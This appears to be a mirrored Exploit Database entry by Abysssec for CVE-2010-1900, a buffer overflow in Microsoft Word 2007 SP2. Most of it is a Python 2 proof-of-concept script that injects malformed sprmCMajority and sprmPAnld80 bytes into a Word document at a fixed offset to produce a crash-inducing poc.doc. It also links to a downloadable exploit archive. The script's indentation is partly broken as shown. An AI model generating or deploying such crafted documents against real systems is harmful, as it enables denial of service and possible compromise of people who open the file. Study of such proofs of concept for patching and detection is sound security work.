Microsoft Word 2007 SP2 – sprmCMajority Buffer Overflow

• Exploit Database
• 16 阅读

• 作者： Abysssec
  日期： 2010-09-11
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14971/

• '''
  ________ __ ____
   |\/|/ __ \ /\| || |_ \ 
   | \/ | || | /\ | || | |_) |
   | |\/| | || |/ /\ \| || |_ < 
   | || | |__| / ____ \ |__| | |_) |
   |_||_|\____/_/\_\____/|____/ 
  
  http://www.exploit-db.com/moaub11-microsoft-office-word-sprmcmajority-buffer-overflow/
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14971.zip (moaub-11-exploit.zip)
  '''
  
  '''
  Title :Microsoft Office Word sprmCMajority buffer overflow
  Version :Word 2007 SP 2
  Analysis :http://www.abysssec.com
  Vendor:http://www.microsoft.com
  Impact:Critical
  Contact :shahin [at] abysssec.com , info[at] abysssec.com
  Twitter :@abysssec
  CVE :CVE-2010-1900
  
  '''
  
  import sys
  
  def main():
   
  try:
  		fdR = open('src.doc', 'rb+')
  		strTotal = fdR.read()
  		str1 = strTotal[:4082]
  		str2 = strTotal[4088:]
  		
  		sprmCMajority = "\x47\xCA\xFF"# sprmCMajority
  		sprmPAnld80 = "\x3E\xC6\xFF"# sprmPAnld80
  				
  		fdW= open('poc.doc', 'wb+')
  		fdW.write(str1)
  		fdW.write(sprmCMajority)
  		fdW.write(sprmPAnld80)				
  		fdW.write(str2)
  		
  		fdW.close()
  		fdR.close()
  		print '[-] Word file generated'
  except IOError:
  print '[*] Error : An IO error has occurred'
  print '[-] Exiting ...'
  sys.exit(-1)
  
  if __name__ == '__main__':
  main()